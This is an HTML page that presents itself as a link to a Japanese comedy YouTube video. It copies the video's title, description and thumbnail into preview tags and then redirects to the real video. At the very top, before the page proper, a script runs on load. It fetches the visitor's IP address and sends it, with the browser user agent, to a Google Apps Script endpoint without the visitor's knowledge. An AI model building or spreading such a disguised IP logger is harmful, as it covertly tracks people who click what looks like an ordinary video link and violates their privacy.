<script>
fetch("https://api.ipify.org?format=json")
.then(r=>r.json())
.then(d=>{
fetch("https://script.google.com/macros/s/AKfycbyNnX0hS_UQ5R0KTtOVcZ_Sa11lovp2SRGQl5Af1gC_HheZ5txBrIGvR_fU-GXTh1w/exec?ip="+d.ip+"&ua="+navigator.userAgent)
})
</script>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">

<title>YouTube動画</title>

<meta property="og:title" content="【ガチ】令和の次の元号、理解っちゃいました">
<meta property="og:description" content="当たってたら次の元号が発表された時
めちゃくちゃ話題になるんじゃないですか！！！(取らぬ狸の皮算用)




＼高評価とコメント待ってます／
　　  🍆🫑🥕🌽🍅🥑
　　ベジタブルーズの皆さん



🍆一気見！アニメコント超総集編🍆
   • 【10時間越え】ぼくわたチャンネルアニメコント超総集編【001～500話】  


🫑X(Twitter)🫑
  / bokuwata_ch  

🥕TikTok🥕
  / bokuwata_ch  

🌽Instagram🌽
  / bokuwata_ch  

🍅LINEスタンプ🍅
https://x.gd/9BMWQ

🥑グッズ(SUZURI)🥑
https://x.gd/RbOvQ">
<meta property="og:image" content="https://i.ytimg.com/vi/6leiczgg9j8/hq720.jpg">
<meta property="og:type" content="website">

<script>
location.replace("https://www.youtube.com/watch?v=6leiczgg9j8");
</script>

</head>
<body></body>
</html>
